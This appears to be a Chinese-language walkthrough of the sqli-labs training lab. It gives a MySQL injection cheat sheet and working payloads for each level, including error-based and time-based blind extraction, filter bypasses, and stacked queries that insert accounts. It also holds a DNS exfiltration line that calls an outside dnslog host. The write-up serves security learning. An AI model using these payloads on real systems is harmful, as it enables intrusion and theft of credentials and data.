sqli-labs通关笔记

1.通用查询

1.1.函数

  1. concat(arg1,arg2,arg3); arg可拼接字符串或者查询语句或列名
  2. group_concat(arg); 用于将当列中的所有数据拼接成一组返回
  3. concat_ws(str1,arg1,arg2,arg3);使用str1将参数中的三个数据进行拼接
  4. substr(str,argint1,argint2);表示字符串截取, argint1表示截取开始索引,argint2,表示截取长度,索引从1开始
  5. mid,substr的完美替代品
1
2
3
select mid((select database()),1,1);

select mid((select database()) from 1 for 1);
  1. ascii(arg), 用于字符返回的ascii码,返回数字,常用于二分法。可使用ord替代
  2. extractvalue(1,concat(0x7e,(arg),0x7e));arg为查询参数,最长有效字符为32位
  3. updatexml(1,concat(0x7e,(arg),0x7e),1);和上面同理
  4. exp(arg); exp报错函数
  5. sleep(argint);延时注入函数,argint为数字表示延时秒数
  6. group by x; group by报错,只适用于较少版本
  7. order by argint;arg为数字用于上条查询语句返回行数
  8. regexp 可以代替等号
  9. between argint and argint 可用于ascii判断,或者当两参数相同时可用来代替等号
  10. limit argint1,argint2 argint1,为索引, argint2为限制数量 索引从0开始
  • 逗号过滤绕过特技

  1. 在堆叠注入中使用 cross join 绕过逗号过滤,

    • eg:

      1
      INSERT INTO users SELECT * FROM (SELECT 3)a CROSS JOIN (SELECT 'systest')b CROSS JOIN (SELECT '15661561521')c

  2. 在联合注入中使用join绕过逗号过滤

  3. 使用offset绕过 limit后的逗号过滤 limit 1 offset 0等于 limit 1,0;

  4. 使用from x for 1 绕过substr()中的逗号过滤

  5. 具体示例https://github.com/takakie/CVE/blob/main/home-rental/home-rental-sqlinject1.md

1.2.特殊字符

  1. 0x7e 等于 ~
  2. 0x81~0xFF %df用于宽字节注入 将后面的特殊符号给吃掉一个,利用中文的两个字节的特性
  3. /* / –+ /!* */ ; # 注释

1.3.特殊表,列,库

  1. information_schema 存储库中所有的库表信息
  2. schemata 用于查询都有那些库
  3. tables 用于查询哪个库中都有那些表
  4. columns 用于查询哪个表中都有那些列
  5. 库名schema_name,表名table_name,列名column_name

1.4.特殊查询语句

  1. 查当前库 select database()

  2. 查当前数据版本 select version()

  3. 查当前用户 select user()

  4. 查数据库中都有哪些库

    1
    select group_concat(schema_name) from information_schema.schemata

  5. 查对应库中都有哪些表(注意这里是table_schema不是schema_name)

    1
    select group_concat(table_name) from information_schema.tables where table_schema = 'args'

  6. 查对应表中都有哪些列

    1
    select group_concat(column_name) from information_schema.columns where table_name = 'args'

  7. 报错查询语句

    1
    2
    3
    4
    5
    and updatexml(1,concat(0x7e,(select database()),0x7e),1);
    and extractvalue(1,concat(0x7e,(select database()),0x7e));
    # 查询库中列为flag的表和对应库
    and updatexml(1,(concat(0x7e,(select concat_ws('@',1,table_schema,table_name) from information_schema.columns where column_name='flag' limit 1,1),0x7e)),1)
    exp(~(select * from (select user())as a))

  8. 时间盲注

    1
    2
    and if(substr((select database()),1,1)='r',sleep(1),1)
    and if(ascii(substr((select database()),1,1))>100,sleep(1),1)

  9. 查询对应数据表中的数据

    1
    2
    select 1,(select group_concat(concat(username,':',password)) from users),database()
    select 1,(select concat_ws('~',id,username,password) from users limit 1,1),3

  10. flag判空

    1
    2
    select flag from metinfo.met_lang where COALESCE(flag, '') != '';
    select flag from metinfo.met_lang where flag != '' and flag is not null;

2.课程笔记

1.Less 1

  1. 直接单引号字符型型注入payload : ‘
  • ?id=-1’ union select 1, 2, 3 –+

2.Less 2

  • ?id=-1 union select 1, 2, 3 –+

3.Less 3

  • ?id=-1’) union select 1,2,3 –+

4.Less 4

  • ?id=-1”) union select 1,2,3 –+

5.Less 5

  • ?id=1’ and updatexml(1,concat(0x7e,database(),0x7e),1) –+

6.Less 6

  • ?id=1” and updatexml(1,concat(0x7e,database(),0x7e),1) –+

7.Less 7

  • ?id=1’))+and+load_file(concat(‘//‘,(database()),’.btcee6.dnslog.cn/123’))–+

8.Less 8

  • ?id=1’+and+1=if(substr(database(),1,1)=’s’,1,2)–+

9.Less 9

  • ?id=1’+and+if(1=1,sleep(2),2)–+

10.Less 10

  • ?id=1%22+and+if(substr(user(),1,1)=’r’,sleep(1),1)–+

11.Less 11

  • uname=admin’+union+select+(select+flag+from+metinfo.met_lang+where+flag+is+not+null+and+flag+!=+’’limit+0,1),(database())–+&passwd=1234562

12.Less 12

  • uname=-admin”)+union+select+1,database()–+&passwd=admin&submit=Submit

13.Less 13

  • uname=admin’)+and+updatexml(1,concat(0x7e,user(),0x7e),1)–+

14.Less 14

  • uname=admin”+and+extractvalue(1,concat(0x7e,user(),0x7e))–+

15.Less 15

  • uname=admin’+and+1=if(substr(database(),1,1)=’s’,1,2)–+

16.Less 16

  • uname=admin”)+and+1=if(substr(database(),1,1)=’s’,1,2)–+

17.Less 17

  • passwd=123456’+where+updatexml(1,concat(0x7e,database(),0x7e),1);–+

18.Less 18(insert)

  • ‘ OR updatexml(1,concat(0x7e,database()),0x7e) OR ‘
1
2
# 后端执行的sql语句
insert into uagents (uagent,ip_address,username) values ('' OR updatexml(1,concat(0x7e,database()),0x7e) OR '','192.168.31.246','admin')

19.Less 19(insert)

  • Referer: ‘or updatexml(1,concat(0x7e,database(),0x7e),1) or’

  • 注:如果出现FUNCTION security.updataxml does not exist,函数不存在看一下是不是函数名写错了

20.Less 20

  • Cookie: uname=admin’ and updatexml(1,concat(0x7e,database(),0x7e),1) – sd
  • Cookie: uname=J29yIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLGRhdGFiYXNlKCksMHg3ZSksMSkgb3In

22.Less 22

  • Cookie: uname=YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSxkYXRhYmFzZSgpLDB4N2UpLDEpLS0gcw==
  • Cookie: uname=admin” and updatexml(1,concat(0x7e,database(),0x7e),1)– s

23.Less 23(移除注释)

  • ?id=-2’+union+select+1,database(),’

24.Less 24(二次注入)

  • 在新建用户中username=admin’+–+1
  • 然后登录用户username=admin’+–+1,
  • 最后输入任意密码,修改admin密码成功。

25.Less 25 (过滤and\or)

  • ?id=-2’+union+select+1,database(),3–+
  • || 符号可以代替 or
  • anandd,或者双写绕过

26.Less 25a

  • ?id=-2+union+select+1,database(),3–+

27.Less 26

  • %a0 可以绕过空格检查非断行空格

  • ?id=0’union%a0select%a01,database(),’3

28.Less 26a

  • ?id=0’)%a0union%a0select%a01,2,(‘3

29.Less 27

  • ?id=3’%a0and%a0extractvalue(1,concat(0x7e,database(),0x7e))%a0and%a0’’=’

30.Less 27a

  • ?id=1”%a0and%a0substr(database(),5,1)=’r’%a0and%a0””=”

31.Less 28

  • ?id=0’)%a0UnIOn%a0seLeCt%a01,database(),(‘3

32.Less 28a

  • ?id=3’)%a0and%a0substr(database(),1,1)=’s’%a0and%a0’’=(‘

33.Less 29

  • ?id=-1’ union select 1,database(),3 –+
  • 有点没看明白

34.Less 30

  • ?id=-2” union select 1,database(),3 –+

35.Less 31

  • ?id=-1”)union+select+1,database(),3–+

36.Less 32

  • ?id=0%df’+union+select+1,database(),3–+
  • 利用%df宽字节注入吃掉后面的/

37.Less 33

  • ?id=-2%df’+union+select+1,database(),3–+

38.Less 34

  • uname=admin%df’+and+extractvalue(1,concat(0x7e,database(),0x7e))–+x

39.Less 35

  • ?id=-2+union+select+1,database(),3–+

40.Less 36

  • ?id=-2%df’+union+select+1,database(),3–+-

41.Less 37

  • uname=admin%df’+and+extractvalue(1,concat(0x7e,database(),0x7e))–+-

42.Less 38

  • ?id=-2’+union+select+1,database(),3–+

43.Less 39

  • ?id=-2’+union+select+1,database(),3–+

  • ?id=2’;insert+into+users+(id,username,password)+values+(16,’admin12343’,’password’)–+

44.Less 40

  • ?id=1;insert+into+users(username,password)+values(‘admin123’,’123456’)–+

45.Less 41

  • ?id=-2;insert+into+users(username,password)+values(‘admin41’,’123456’)–+

46.Less 42

  • login_password=admin’;insert+into+users(username,password)+values(‘admin42’,’123’)–+

47.Less 43

  • login_password=admin’);insert+into+users(username,password)+values(‘admin43’,’123456’)–+

48.Less 44

  • login_password=admin’;insert into users(username,password) values(‘admin44’,’123456’)–+

49.Less 45

  • login_password=admin’);insert+into+users(username,password)+values(‘admin45’,’123456’)–+

50.Less 46(Order by)(数字型)

  • 通过rand(0) 和 rand(1)来判断排序是否相同

  • ?sort=rand(extractvalue(1,concat(0x7e,database(),0x7e)))

  • SELECT * FROM users ORDER BY $id

51.Less 47 (字符串型)

  • ?sort=1’+and+extractvalue(1,concat(0x7e,database(),0x7e))–+
  • SELECT * FROM users ORDER BY ‘$id’

52.Less 48

  • ?sort=rand(substr(database(),2,1)=’e’)

53.Less 49

  • ?sort=1’+and+if(substr(database(),1,1)=’a’,sleep(0.2),2)–+

54.Less 50

  • ?sort=1;insert+into+users(username,password)+values(‘admin50’,’123456’);

55.Less 51

  • ?sort=1’;insert+into+users(username,password)+values(‘admin51’,’123456’);–+

56.Less 52

  • ?sort=1;insert+into+users(username,password)+values(‘admin52’,’123456’);

57.Less 53

  • ?sort=1’;insert+into+users(username,password)+values(‘admin53’,’123456’);

58.Less 54(正式挑战开始)

  • ?id=-1’+union+select+1,(select+secret_HN7O+from+CHALLENGES.8u96bgqr6k+limit 0,1),3–+
1
2
3
4
5
6
7
8
# 获取列名
select group_concat(column_name) from information_schema.columns where table_schema='CHALLENGES'
# 获取表名
select group_concat(table_name) from information_schema.tables where table_schema='CHALLENGES'
# 列表一起查
select group_concat(concat(table_name,'@',column_name)) from information_schema.columns where table_schema='CHALLENGES' 
# 列表一起查 升级版
select concat(table_name,'@',column_name) from information_schema.columns where table_schema='CHALLENGES' and substr(column_name,1,6)='secret'

59.Less 55

  • ?id=-1)+union+select+1,(select secret_MPMF from challenges.6c905h5gnb limit 0,1),3–+

60.Less 56

  • ?id=-1”)–+

61.Less 57

  • ?id=-2”+union+select+1,(select secret_SP7C from challenges.16vjhzk4v6),3–+

62.Less 58

  • ?id=1’+and+exp(~(select * from (select concat(table_name,‘@’,column_name) from information_schema.columns where table_schema=’CHALLENGES’ and substr(column_name,1,6)=’secret’)as a));–+

63.Less 59

  • ?id=1+and+exp(~(select * from (select secret_A464 from challenges.ee4euc0k32)as a));–+

64.Less 60

  • ?id=2”)+and+exp(~(select * from (select concat(table_name,‘@’,column_name) from information_schema.columns where table_schema=’CHALLENGES’ and substr(column_name,1,6)=’secret’)as a));–+

65.Less 61

  • ?id=2’))+and+exp(~(select * from (select secret_5NFH from challenges.3pw6shmv87)as a));–+

66.Less 62

  • kUJ5DvUgf8TvbETeyoCDFxsS